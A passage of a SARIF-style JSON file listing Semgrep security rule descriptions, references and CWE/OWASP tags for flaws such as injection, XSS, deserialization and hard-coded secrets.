Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","id":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","name":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"help":{"markdown":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication)\n - [https://cwe.mitre.org/data/definitions/287.html](https://cwe.mitre.org/data/definitions/287.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n","text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"helpUri":"https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","id":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","name":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A04:2021 Insecure Design","OWASP-A07:2021 Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","id":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","name":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep)\n - [https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html](https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"helpUri":"https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","id":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","name":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"helpUri":"https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","id":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","name":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express","id":"javascript.express.code.puppeteer-express.puppeteer-express","name":"javascript.express.code.puppeteer-express.puppeteer-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.puppeteer-express.puppeteer-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli)\n - [https://github.com/MagicStack/asyncpg](https://github.com/MagicStack/asyncpg)\n - [https://magicstack.github.io/asyncpg/current/](https://magicstack.github.io/asyncpg/current/)\n","text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","id":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","name":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"help":{"markdown":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper)\n","text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper","id":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","name":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-textiowrapper"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"help":{"markdown":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter)\n - [https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/](https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/)\n - [https://golang.org/pkg/io/#WriteString](https://golang.org/pkg/io/#WriteString)\n","text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","id":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","name":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"help":{"markdown":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html)\n","text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"helpUri":"https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket","id":"json.aws.security.public-s3-bucket.public-s3-bucket","name":"json.aws.security.public-s3-bucket.public-s3-bucket","properties":{"precision":"very-high","tags":["CWE-264: CWE CATEGORY: Permissions, Privileges, and Access Controls","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.public-s3-bucket.public-s3-bucket"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"help":{"markdown":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write","id":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","name":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-command-write.dangerous-command-write"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli","id":"kotlin.spring.hibernate-sqli.hibernate-sqli","name":"kotlin.spring.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"help":{"markdown":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality)\n - [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)\n - [https://www.whitehatsec.com/blog/magic-hashes/](https://www.whitehatsec.com/blog/magic-hashes/)\n","text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"helpUri":"https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality","id":"php.lang.security.md5-loose-equality.md5-loose-equality","name":"php.lang.security.md5-loose-equality.md5-loose-equality","properties":{"precision":"very-high","tags":["CWE-697: Incorrect Comparison","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.md5-loose-equality.md5-loose-equality"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"bcrypt hash detected"},"help":{"markdown":"bcrypt hash detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"bcrypt hash detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","id":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","name":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli)\n - [https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries](https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli","id":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","name":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - 